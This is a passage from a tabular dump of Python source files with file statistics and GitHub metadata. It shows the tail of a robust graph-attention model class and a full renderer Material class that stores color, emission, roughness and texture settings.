mean_kwargs : Dict[str, Any], optional
Arguments for the mean, by default dict(k=64, temperature=1.0, with_weight_correction=True)
"""
def __init__(self,
mean: str = 'soft_k_medoid',
mean_kwargs: Dict[str, Any] = dict(k=64, temperature=1.0, with_weight_correction=True),
**kwargs):
self._mean_kwargs = dict(mean_kwargs)
self._mean = mean
super().__init__(**kwargs)
assert not self.do_checkpoint, 'Checkpointing is not supported'
def _build_conv_layer(self, in_channels: int, out_channels: int):
return RGATConv(mean=self._mean, mean_kwargs=self._mean_kwargs,
in_channels=in_channels, out_channels=out_channels)
def _cache_if_option_is_set(self, callback, x, edge_idx, edge_weight):
return SparseTensor.from_edge_index(edge_idx, edge_weight, (x.shape[0], x.shape[0])), None
| 36.443662 | 119 | 0.636329 | 4,940 | 0.954221 | 0 | 0 | 0 | 0 | 0 | 0 | 2,295 | 0.443307 |
7334d673ab4fa7b6545531cff68878e44e4b4835 | 902 | py | Python | code/renderer/randomize/material.py | jonathangranskog/shading-scene-representations | 9c9033a1ca05095c7e2ccfeb4da3046b687bef3d | [
"MIT"
]
| 21 | 2020-09-28T10:38:04.000Z | 2022-03-12T08:46:09.000Z | code/renderer/randomize/material.py | jonathangranskog/shading-scene-representations | 9c9033a1ca05095c7e2ccfeb4da3046b687bef3d | [
"MIT"
]
| null | null | null | code/renderer/randomize/material.py | jonathangranskog/shading-scene-representations | 9c9033a1ca05095c7e2ccfeb4da3046b687bef3d | [
"MIT"
]
| 1 | 2020-12-16T14:56:21.000Z | 2020-12-16T14:56:21.000Z | import numpy as np
import pyrr
import os
class Material():
def __init__(self, color=np.ones(3, dtype=np.float32), emission=np.zeros(3, dtype=np.float32), roughness=1.0, ior=15.0, id=0, texture=None, texture_frequency=np.array([1.0, 1.0])):
self.color = color
self.emission = emission
self.roughness = roughness
self.ior = ior
if not texture is None:
self.texture = os.path.abspath(texture)
else:
self.texture = ""
self.texture_frequency = texture_frequency
self.id = id
def as_dict(self):
d = {}
d["color"] = self.color.tolist()
d["emission"] = self.emission.tolist()
d["roughness"] = self.roughness
d["ior"] = self.ior
d["texture"] = self.texture
d["texture_frequency"] = self.texture_frequency.tolist()
d["id"] = self.id
return d | 32.214286 | 184 | 0.586475 | 860 | 0.953437 | 0 | 0 | 0 | 0 | 0 | 0 | 67 | 0.074279 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.